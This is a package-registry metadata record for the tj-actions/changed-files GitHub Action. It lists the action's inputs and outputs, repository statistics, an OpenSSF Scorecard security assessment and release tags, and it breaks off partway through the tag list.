{"id":5800103,"name":"tj-actions/changed-files","ecosystem":"actions","description":"Get all Added, Copied, Modified, Deleted, Renamed, Type changed, Unmerged, and Unknown files.","homepage":"","licenses":"mit","normalized_licenses":["MIT"],"repository_url":"https://github.com/tj-actions/changed-files","keywords_array":["actions","change-detection","change-detetion","changed-file","changed-files","ci","ci-cd","conditional-execution","continuous-delivery","continuous-integration","github","github-actions","modified","modified-files","monorepo","restore-files","submodules","workflows","yaml-files"],"namespace":"tj-actions","versions_count":379,"first_release_published_at":"2021-03-05T12:40:19.000Z","latest_release_published_at":"2026-04-18T11:19:11.000Z","latest_release_number":"v47.0.6","last_synced_at":"2026-09-16T07:11:18.550Z","created_at":"2023-01-04T11:50:59.004Z","updated_at":"2026-09-16T07:11:18.550Z","registry_url":"https://github.com/tj-actions/changed-files","install_command":null,"documentation_url":null,"metadata":{"name":"Changed Files","description":"Get all Added, Copied, Modified, Deleted, Renamed, Type changed, Unmerged, and Unknown files.","author":"tj-actions","inputs":{"separator":{"description":"Split character for output strings.","required":false,"default":" "},"include_all_old_new_renamed_files":{"description":"Include `all_old_new_renamed_files` output. Note this can generate a large output See: #501.","required":false,"default":"false"},"old_new_separator":{"description":"Split character for old and new filename pairs.","required":false,"default":","},"old_new_files_separator":{"description":"Split character for old and new renamed filename pairs.","required":false,"default":" "},"files_from_source_file":{"description":"Source file(s) used to populate the `files` input.","required":false,"default":""},"files_from_source_file_separator":{"description":"Separator used to split the `files_from_source_file` input.","default":"\n","required":false},"files":{"description":"File and directory patterns used to detect changes (Defaults to the entire repo if unset).\nNOTE: Multiline file/directory patterns should not include quotes.\n","required":false,"default":""},"files_separator":{"description":"Separator used to split the `files` input","default":"\n","required":false},"files_yaml":{"description":"YAML used to define a set of file patterns to detect changes","required":false,"default":""},"files_yaml_from_source_file":{"description":"Source file(s) used to populate the `files_yaml` input. Example: https://github.com/tj-actions/changed-files/blob/main/test/changed-files.yml","required":false,"default":""},"files_yaml_from_source_file_separator":{"description":"Separator used to split the `files_yaml_from_source_file` input","default":"\n","required":false},"files_ignore_yaml":{"description":"YAML used to define a set of file patterns to ignore changes","required":false,"default":""},"files_ignore_yaml_from_source_file":{"description":"Source file(s) used to populate the `files_ignore_yaml` input. Example: https://github.com/tj-actions/changed-files/blob/main/test/changed-files.yml","required":false,"default":""},"files_ignore_yaml_from_source_file_separator":{"description":"Separator used to split the `files_ignore_yaml_from_source_file` input","default":"\n","required":false},"files_ignore":{"description":"Ignore changes to these file(s). NOTE: Multiline file/directory patterns should not include quotes.","required":false,"default":""},"files_ignore_separator":{"description":"Separator used to split the `files_ignore` input","default":"\n","required":false},"files_ignore_from_source_file":{"description":"Source file(s) used to populate the `files_ignore` input","required":false,"default":""},"files_ignore_from_source_file_separator":{"description":"Separator used to split the `files_ignore_from_source_file` input","default":"\n","required":false},"sha":{"description":"Specify a different commit SHA or branch used for comparing changes","required":false},"base_sha":{"description":"Specify a different base commit SHA or branch used for comparing changes","required":false},"since":{"description":"Get changed files for commits whose timestamp is older than the given time.","required":false,"default":""},"until":{"description":"Get changed files for commits whose timestamp is earlier than the given time.","required":false,"default":""},"path":{"description":"Specify a relative path under `$GITHUB_WORKSPACE` to locate the repository.","required":false,"default":"."},"quotepath":{"description":"Use non-ASCII characters to match files and output the filenames completely verbatim by setting this to `false`","default":"true","required":false},"diff_relative":{"description":"Exclude changes outside the current directory and show path names relative to it. NOTE: This requires you to specify the top-level directory via the `path` input.","required":false,"default":"true"},"dir_names":{"default":"false","description":"Output unique changed directories instead of filenames. NOTE: This returns `.` for changed files located in the current working directory which defaults to `$GITHUB_WORKSPACE`.","required":false},"dir_names_max_depth":{"description":"Limit the directory output to a maximum depth e.g `test/test1/test2` with max depth of `2` returns `test/test1`.","required":false},"dir_names_exclude_current_dir":{"description":"Exclude the current directory represented by `.` from the output when `dir_names` is set to `true`.","required":false,"default":"false"},"dir_names_include_files":{"description":"File and directory patterns to include in the output when `dir_names` is set to `true`. NOTE: This returns only the matching files and also the directory names.","required":false,"default":""},"dir_names_include_files_separator":{"description":"Separator used to split the `dir_names_include_files` input","default":"\n","required":false},"dir_names_deleted_files_include_only_deleted_dirs":{"description":"Include only directories that have been deleted as opposed to directory names of files that have been deleted in the `deleted_files` output when `dir_names` is set to `true`.","required":false,"default":"false"},"json":{"description":"Output list of changed files in a JSON formatted string which can be used for matrix jobs. Example: https://github.com/tj-actions/changed-files/blob/main/.github/workflows/matrix-example.yml","required":false,"default":"false"},"escape_json":{"description":"Escape JSON output.","required":false,"default":"true"},"safe_output":{"description":"Apply sanitization to output filenames before being set as output.","required":false,"default":"true"},"fetch_depth":{"description":"Depth of additional branch history fetched. NOTE: This can be adjusted to resolve errors with insufficient history.","required":false,"default":"25"},"skip_initial_fetch":{"description":"Skip initially fetching additional history to improve performance for shallow repositories.\nNOTE: This could lead to errors with missing history. It's intended to be used when you've fetched all necessary history to perform the diff.\n","required":false,"default":"false"},"fetch_additional_submodule_history":{"description":"Fetch additional history for submodules.","required":false,"default":"false"},"since_last_remote_commit":{"description":"Use the last commit on the remote branch as the `base_sha`. Defaults to the last non-merge commit on the target branch for pull request events and the previous remote commit of the current branch for push events.","required":false,"default":"false"},"write_output_files":{"description":"Write outputs to the `output_dir` defaults to `.github/outputs` folder. NOTE: This creates a `.txt` file by default and a `.json` file if `json` is set to `true`.","required":false,"default":"false"},"output_dir":{"description":"Directory to store output files.","required":false,"default":".github/outputs"},"output_renamed_files_as_deleted_and_added":{"description":"Output renamed files as deleted and added files.","required":false,"default":"false"},"recover_deleted_files":{"description":"Recover deleted files.","required":false,"default":"false"},"recover_deleted_files_to_destination":{"description":"Recover deleted files to a new destination directory, defaults to the original location.","required":false,"default":""},"recover_files":{"description":"File and directory patterns used to recover deleted files,\ndefaults to the patterns provided via the `files`, `files_from_source_file`, `files_ignore` and `files_ignore_from_source_file` inputs \nor all deleted files if no patterns are provided.\n","required":false,"default":""},"recover_files_separator":{"description":"Separator used to split the `recover_files` input","default":"\n","required":false},"recover_files_ignore":{"description":"File and directory patterns to ignore when recovering deleted files.","required":false,"default":""},"recover_files_ignore_separator":{"description":"Separator used to split the `recover_files_ignore` input","default":"\n","required":false},"token":{"description":"GitHub token used to fetch changed files from Github's API.","required":false,"default":"${{ github.token }}"},"api_url":{"description":"Github API URL.","required":false,"default":"${{ github.api_url }}"},"use_rest_api":{"description":"Force the use of Github's REST API even when a local copy of the repository exists","required":false,"default":"false"},"fail_on_initial_diff_error":{"description":"Fail when the initial diff fails.","required":false,"default":"false"},"fail_on_submodule_diff_error":{"description":"Fail when the submodule diff fails.","required":false,"default":"false"},"negation_patterns_first":{"description":"Apply the negation patterns first. NOTE: This affects how changed files are matched.","required":false,"default":"false"},"matrix":{"description":"Output changed files in a format that can be used for matrix jobs. Alias for setting inputs `json` to `true` and `escape_json` to `false`.","required":false,"default":"false"},"exclude_submodules":{"description":"Exclude changes to submodules.","required":false,"default":"false"},"exclude_symlinks":{"description":"Exclude symlinks from changed files.","required":false,"default":"false"},"skip_same_sha":{"description":"Do not fail when base and head SHAs are identical.","required":false,"default":"false"},"fetch_missing_history_max_retries":{"description":"Maximum number of retries to fetch missing history.","required":false,"default":"20"},"use_posix_path_separator":{"description":"Use POSIX path separator `/` for output file paths on Windows.","required":false,"default":"false"},"tags_pattern":{"description":"Tags pattern to include.","required":false,"default":"*"},"tags_ignore_pattern":{"description":"Tags pattern to ignore.","required":false,"default":""}},"outputs":{"added_files":{"description":"Returns only files that are Added (A)."},"added_files_count":{"description":"Returns the number of `added_files`"},"any_added":{"description":"Returns `true` when any of the filenames provided using the `files*` or `files_ignore*` inputs have been added."},"copied_files":{"description":"Returns only files that are Copied (C)."},"copied_files_count":{"description":"Returns the number of `copied_files`"},"deleted_files":{"description":"Returns only files that are Deleted (D)."},"deleted_files_count":{"description":"Returns the number of `deleted_files`"},"modified_files":{"description":"Returns only files that are Modified (M)."},"modified_files_count":{"description":"Returns the number of `modified_files`"},"renamed_files":{"description":"Returns only files that are Renamed (R)."},"renamed_files_count":{"description":"Returns the number of `renamed_files`"},"all_old_new_renamed_files":{"description":"Returns only files that are Renamed and lists their old and new names. **NOTE:** This requires setting `include_all_old_new_renamed_files` to `true`. Also, keep in mind that this output is global and wouldn't be nested in outputs generated when the `*_yaml_*` input is used. (R)"},"all_old_new_renamed_files_count":{"description":"Returns the number of `all_old_new_renamed_files`"},"type_changed_files":{"description":"Returns only files that have their file type changed (T)."},"type_changed_files_count":{"description":"Returns the number of `type_changed_files`"},"unmerged_files":{"description":"Returns only files that are Unmerged (U)."},"unmerged_files_count":{"description":"Returns the number of `unmerged_files`"},"unknown_files":{"description":"Returns only files that are Unknown (X)."},"unknown_files_count":{"description":"Returns the number of `unknown_files`"},"all_changed_and_modified_files":{"description":"Returns all changed and modified files i.e. a combination of (ACMRDTUX)"},"all_changed_and_modified_files_count":{"description":"Returns the number of `all_changed_and_modified_files`"},"all_changed_files":{"description":"Returns all changed files i.e. a combination of all added, copied, modified and renamed files (ACMR)"},"all_changed_files_count":{"description":"Returns the number of `all_changed_files`"},"any_changed":{"description":"Returns `true` when any of the filenames provided using the `files*` or `files_ignore*` inputs have changed. This defaults to `true` when no patterns are specified. i.e. *includes a combination of all added, copied, modified and renamed files (ACMR)*."},"only_changed":{"description":"Returns `true` when only files provided using the `files*` or `files_ignore*` inputs have changed. i.e. *includes a combination of all added, copied, modified and renamed files (ACMR)*."},"other_changed_files":{"description":"Returns all other changed files not listed in the files input i.e. includes a combination of all added, copied, modified and renamed files (ACMR)."},"other_changed_files_count":{"description":"Returns the number of `other_changed_files`"},"all_modified_files":{"description":"Returns all changed files i.e. a combination of all added, copied, modified, renamed and deleted files (ACMRD)."},"all_modified_files_count":{"description":"Returns the number of `all_modified_files`"},"any_modified":{"description":"Returns `true` when any of the filenames provided using the `files*` or `files_ignore*` inputs have been modified. This defaults to `true` when no patterns are specified. i.e. *includes a combination of all added, copied, modified, renamed, and deleted files (ACMRD)*."},"only_modified":{"description":"Returns `true` when only files provided using the `files*` or `files_ignore*` inputs have been modified. (ACMRD)."},"other_modified_files":{"description":"Returns all other modified files not listed in the files input i.e. a combination of all added, copied, modified, and deleted files (ACMRD)"},"other_modified_files_count":{"description":"Returns the number of `other_modified_files`"},"any_deleted":{"description":"Returns `true` when any of the filenames provided using the `files*` or `files_ignore*` inputs have been deleted. This defaults to `true` when no patterns are specified. (D)"},"only_deleted":{"description":"Returns `true` when only files provided using the `files*` or `files_ignore*` inputs have been deleted. (D)"},"other_deleted_files":{"description":"Returns all other deleted files not listed in the files input i.e. a combination of all deleted files (D)"},"other_deleted_files_count":{"description":"Returns the number of `other_deleted_files`"},"modified_keys":{"description":"Returns all modified YAML keys when the `files_yaml` input is used. i.e. key that contains any path that has either been added, copied, modified, and deleted (ACMRD)"},"changed_keys":{"description":"Returns all changed YAML keys when the `files_yaml` input is used. i.e. key that contains any path that has either been added, copied, modified, and renamed (ACMR)"}},"runs":{"using":"node24","main":"dist/index.js"},"branding":{"icon":"file-text","color":"white"},"default_branch":"main","path":null},"repo_metadata":{"id":37543790,"uuid":"344672439","full_name":"tj-actions/changed-files","owner":"tj-actions","description":":octocat: Github action to retrieve all (added, copied, modified, deleted, renamed, type changed, unmerged, unknown) files and directories.","archived":false,"fork":false,"pushed_at":"2026-08-07T01:37:47.000Z","size":51110,"stargazers_count":2718,"open_issues_count":36,"forks_count":336,"subscribers_count":11,"default_branch":"main","last_synced_at":"2026-09-09T21:06:54.747Z","etag":null,"topics":["actions","change-detection","change-detetion","changed-file","changed-files","ci","ci-cd","conditional-execution","continuous-delivery","continuous-integration","github","github-actions","modified","modified-files","monorepo","restore-files","submodules","workflows","yaml-files"],"latest_commit_sha":null,"homepage":"","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/tj-actions.png","metadata":{"files":{"readme":"README.md","changelog":"HISTORY.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":"CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":null,"gemini":null,"cursor":null,"copilot":null,"dco":null,"cla":null,"disclosure":null},"funding":{"github":["jackton1"],"patreon":null,"open_collective":"tj-actions","ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"custom":[]}},"created_at":"2021-03-05T02:35:53.000Z","updated_at":"2026-09-08T04:24:14.000Z","dependencies_parsed_at":"2026-08-20T12:21:12.733Z","dependency_job_id":"dd39b8d6-01ab-40ed-97e8-fd4cee47174e","html_url":"https://github.com/tj-actions/changed-files","commit_stats":{"total_commits":3015,"total_committers":40,"mean_commits":75.375,"dds":"0.37777777777777777","last_synced_commit":"435fd74b2ec5d115590c1a20ba1101bf9a291563"},"previous_names":[],"tags_count":379,"template":false,"template_full_name":null,"purl":"pkg:github/tj-actions/changed-files","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/tj-actions","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/sbom","scorecard":{"id":874506,"data":{"date":"2025-08-11","repo":{"name":"github.com/tj-actions/changed-files","commit":"2036da178f85576f1940fedb74bb93a36cd89ab7"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":6.3,"checks":[{"name":"Code-Review","score":0,"reason":"Found 0/1 approved changesets -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Info: jobLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:34","Info: jobLevel 'actions' permission set to 'read': .github/workflows/codeql.yml:33","Info: jobLevel 'contents' permission set to 'read': .github/workflows/test.yml:991","Info: jobLevel 'contents' permission set to 'read': .github/workflows/test.yml:1154","Info: jobLevel 'contents' permission set to 'read': .github/workflows/test.yml:244","Info: jobLevel 'contents' permission set to 'read': .github/workflows/test.yml:288","Info: jobLevel 'contents' permission set to 'read': .github/workflows/test.yml:320","Info: jobLevel 'contents' permission set to 'read': .github/workflows/test.yml:390","Info: jobLevel 'contents' permission set to 'read': .github/workflows/test.yml:568","Info: jobLevel 'contents' permission set to 'read': .github/workflows/test.yml:605","Info: jobLevel 'contents' permission set to 'read': .github/workflows/test.yml:704","Info: jobLevel 'contents' permission set to 'read': .github/workflows/test.yml:799","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/test.yml:38","Info: jobLevel 'pull-requests' permission set to 'read': .github/workflows/test.yml:39","Info: jobLevel 'contents' permission set to 'read': .github/workflows/test.yml:361","Info: jobLevel 'contents' permission set to 'read': .github/workflows/test.yml:426","Info: jobLevel 'contents' permission set to 'read': .github/workflows/test.yml:638","Info: jobLevel 'contents' permission set to 'read': .github/workflows/test.yml:1102","Info: jobLevel 'contents' permission set to 'read': .github/workflows/test.yml:109","Info: jobLevel 'contents' permission set to 'read': .github/workflows/test.yml:185","Info: jobLevel 'contents' permission set to 'read': .github/workflows/test.yml:481","Info: jobLevel 'pull-requests' permission set to 'read': .github/workflows/test.yml:536","Info: jobLevel 'contents' permission set to 'read': .github/workflows/test.yml:1029","Info: topLevel 'actions' permission set to 'read': .github/workflows/codacy-analysis.yml:21","Info: topLevel 'contents' permission set to 'read': .github/workflows/codacy-analysis.yml:22","Warn: topLevel 'security-events' permission set to 'write': .github/workflows/codacy-analysis.yml:23","Info: topLevel 'actions' permission set to 'read': .github/workflows/codeql.yml:24","Info: topLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:25","Warn: topLevel 'security-events' permission set to 'write': .github/workflows/codeql.yml:26","Info: topLevel 'contents' permission set to 'read': .github/workflows/issue-comment-job-example.yml:4","Info: topLevel 'contents' permission set to 'read': .github/workflows/manual-triggered-job-example.yml:4","Info: topLevel 'contents' permission set to 'read': .github/workflows/matrix-example.yml:4","Info: topLevel 'contents' permission set to 'read': .github/workflows/multi-job-example.yml:4","Warn: topLevel 'contents' permission set to 'write': .github/workflows/sync-release-version.yml:4","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:4","Warn: topLevel 'contents' permission set to 'write': .github/workflows/update-readme.yml:4","Info: topLevel 'contents' permission set to 'read': .github/workflows/workflow-run-example.yml:8"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":3,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: 'branch protection settings apply to administrators' is disabled on branch 'main'","Warn: branch 'main' does not require approvers","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Warn: PRs are not required to make changes on branch 'main'; or we don't have data to detect it.If you think it might be the latter, make sure to run Scorecard with a PAT or use Repo Rules (that are always public) instead of Branch Protection settings"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Pinned-Dependencies","score":10,"reason":"all dependencies are pinned","details":["Info:  58 out of  58 GitHub-owned GitHubAction dependencies pinned","Info:  15 out of  15 third-party GitHubAction dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"SAST","score":10,"reason":"SAST tool is run on all commits","details":["Info: SAST configuration detected: CodeQL","Info: all commits (30) are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":8,"reason":"2 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-968p-4wvh-cqc8","Warn: Project is vulnerable to: GHSA-v6h2-p8h4-qcjw"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-24T05:27:19.559Z","repository_id":37543790,"created_at":"2025-08-24T05:27:19.559Z","updated_at":"2025-08-24T05:27:19.559Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":341189360,"owners_count":37350737,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-09-16T02:00:06.638Z","response_time":96,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"tj-actions","name":"tj-actions","uuid":"67116787","kind":"organization","description":"","email":"support@tj-actions.online","website":null,"location":"Canada","twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/67116787?v=4","repositories_count":49,"last_synced_at":"2024-04-14T17:23:43.854Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/tj-actions","funding_links":[],"total_stars":2211,"followers":65,"following":0,"created_at":"2022-11-14T06:10:42.667Z","updated_at":"2024-04-14T17:23:47.758Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/tj-actions","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/tj-actions/repositories"},"tags":[{"name":"v47.0.6","sha":"9426d40962ed5378910ee2e21d5f8c6fcbf2dd96","kind":"commit","published_at":"2026-04-18T11:19:11.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v47.0.6","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v47.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v47.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v47.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v47.0.6/manifests"},{"name":"v47.0.5","sha":"22103cc46bda19c2b464ffe86db46df6922fd323","kind":"commit","published_at":"2026-03-03T03:51:53.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v47.0.5","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v47.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v47.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v47.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v47.0.5/manifests"},{"name":"v47.0.4","sha":"7dee1b0c1557f278e5c7dc244927139d78c0e22a","kind":"commit","published_at":"2026-02-17T13:38:30.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v47.0.4","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v47.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v47.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v47.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v47.0.4/manifests"},{"name":"v47.0.3","sha":"28b28f6e4e9e3d997beb9dce86cfd8cf0ce7c7f6","kind":"commit","published_at":"2026-02-17T11:47:29.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v47.0.3","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v47.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v47.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v47.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v47.0.3/manifests"},{"name":"v47.0.2","sha":"8cba46e29c11878d930bca7870bb54394d3e8b21","kind":"commit","published_at":"2026-02-09T20:44:36.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v47.0.2","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v47.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v47.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v47.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v47.0.2/manifests"},{"name":"v47.0.1","sha":"e0021407031f5be11a464abee9a0776171c79891","kind":"commit","published_at":"2025-12-11T11:53:39.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v47.0.1","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v47.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v47.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v47.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v47.0.1/manifests"},{"name":"v47.0.0","sha":"24d32ffd492484c1d75e0c0b894501ddb9d30d62","kind":"commit","published_at":"2025-09-13T13:41:48.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v47.0.0","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v47.0.0","dependencies_parsed_at":null,"dependency_job_id":"5b5f737d-3e83-4ad2-b4c0-28fb92bc3e67","purl":"pkg:github/tj-actions/changed-files@v47.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v47.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v47.0.0/manifests"},{"name":"v47","sha":"24d32ffd492484c1d75e0c0b894501ddb9d30d62","kind":"commit","published_at":"2025-09-13T13:41:48.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v47","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v47","dependencies_parsed_at":null,"dependency_job_id":"0584b01f-4458-4a14-b0cc-a0f1fb98770c","purl":"pkg:github/tj-actions/changed-files@v47","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v47","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v47/manifests"},{"name":"v46.0.5","sha":"ed68ef82c095e0d48ec87eccea555d944a631a4c","kind":"commit","published_at":"2025-04-09T03:16:25.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v46.0.5","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v46.0.5","dependencies_parsed_at":null,"dependency_job_id":"23234770-8a6a-4cfd-a595-b0de7bba8739","purl":"pkg:github/tj-actions/changed-files@v46.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v46.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/t